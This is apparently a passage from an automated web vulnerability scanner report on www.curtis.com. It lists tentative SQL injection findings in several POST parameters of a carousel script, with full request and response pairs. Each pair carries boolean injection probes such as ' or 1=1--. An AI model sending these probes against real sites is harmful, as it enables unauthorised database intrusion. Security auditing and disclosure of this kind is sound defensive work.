Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The first_slide_is_intro parameter appears to be vulnerable to SQL injection attacks. The payloads 39183985'%20or%201%3d1--%20 and 39183985'%20or%201%3d2--%20 were each submitted in the first_slide_is_intro parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no39183985'%20or%201%3d1--%20&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no39183985'%20or%201%3d2--%20&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.40. http://www.curtis.com/scripts/carousel/getimages.cfm [hover_next_prev_buttons parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The hover_next_prev_buttons parameter appears to be vulnerable to SQL injection attacks. The payloads 11309222'%20or%201%3d1--%20 and 11309222'%20or%201%3d2--%20 were each submitted in the hover_next_prev_buttons parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no11309222'%20or%201%3d1--%20&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no11309222'%20or%201%3d2--%20&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.41. http://www.curtis.com/scripts/carousel/getimages.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 12395009%20or%201%3d1--%20 and 12395009%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 237

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no&112395009%20or%201%3d1--%20=1

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 237

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no&112395009%20or%201%3d2--%20=1

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.42. http://www.curtis.com/scripts/carousel/getimages.cfm [next_prev_buttons parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The next_prev_buttons parameter appears to be vulnerable to SQL injection attacks. The payloads 15232388'%20or%201%3d1--%20 and 15232388'%20or%201%3d2--%20 were each submitted in the next_prev_buttons parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no15232388'%20or%201%3d1--%20&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no15232388'%20or%201%3d2--%20&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.43. http://www.curtis.com/scripts/carousel/getimages.cfm [pause_button parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The pause_button parameter appears to be vulnerable to SQL injection attacks. The payloads 17457857'%20or%201%3d1--%20 and 17457857'%20or%201%3d2--%20 were each submitted in the pause_button parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no17457857'%20or%201%3d1--%20&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no17457857'%20or%201%3d2--%20&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

